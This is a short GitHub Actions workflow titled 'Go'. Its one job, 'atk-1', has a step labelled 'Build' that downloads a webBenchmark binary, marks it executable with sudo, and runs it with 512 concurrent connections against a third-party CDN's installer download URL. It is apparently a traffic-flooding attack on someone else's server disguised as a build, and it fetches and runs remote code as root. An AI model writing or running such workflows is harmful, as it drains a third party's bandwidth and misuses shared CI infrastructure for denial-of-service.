name: Go

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  atk-1:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2

    - name: Build
      run: |
        sudo wget -N https://github.com/maintell/webBenchmark/releases/download/0.6/webBenchmark_linux_x64 -O wb
        sudo chmod 777 wb
        sudo ./wb -c 512 -s https://cdn.app.pqymiddle.com/ivideotools/iVideoToolsInstaller.1.4.8.0_360_search.exe
